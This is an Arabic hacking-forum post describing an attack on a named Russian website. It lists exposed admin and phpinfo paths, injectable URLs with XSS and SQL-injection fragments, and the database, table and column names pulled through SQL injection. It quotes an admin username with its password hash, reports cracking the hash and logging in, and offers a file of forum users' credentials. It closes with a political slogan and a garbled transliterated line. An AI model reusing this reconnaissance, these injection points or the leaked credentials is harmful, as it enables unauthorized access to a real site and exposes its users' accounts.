بسم الله الرحمن الرحيم
السلام عليكم ورحمه الله وبركاته
http://www.tristihii.ru/
Server: Apache
http://www.tristihii.ru/phpinfo.php
http://www.tristihii.ru/robots.txt
http://www.tristihii.ru/feedback/admin/
http://www.tristihii.ru/forum3//adm(تم تعطيلها من قبل الموقع)
http://www.tristihii.ru/forum3/ucp.php?mode=login ( دخول المنتدي الاعضاء) فكيت الباس المشفر ممكن دخول الادمن من هنا مثل الاعضاء
ثغرات المصابة
http://www.tristihii.ru/raspis/ind.p...)%3C/script%3E
http://www.tristihii.ru/raspis/ind.p...w=1&school=all'
تم استغلال الثغرت sql وستخراج المعلومات
عدد الصفوف: 1040
المفيد
القاعدة stihii38_club الجدول poll_user العمود username,userpass
النتيجة
admin:f5328997cd73821b7258bdfe81d87266
الباس المشفر بعد فكه
تم الدخول ولكن
http://www.tristihii.ru/feedback/admin/
ليس لها صلاحية كافية
القاعدة stihii38_club الجدول forum3_users العمود username,username_clean,user_password,user_email,u ser_email_hash
ملاحظة اذ ماضيفت العمود user_email_hash =82181265626 يطلع ماهو واضح؟؟؟
النتيجة
يرفع لكم ملف txt
فك الباسبورد المشفر
دخل من هنا url]http://www.tristihii.ru/forum3/ucp.php?mode=login
ركز على رقم [23]
ممكن يكون دخول نفس الاعضاء
فمان الرحمن
تضامن مع الشعب السوري الحر
lug,lhj l,ru lu hgh]lk f,hs'm ohg] su,]d jqhlk hgauf hgs,vd hgpv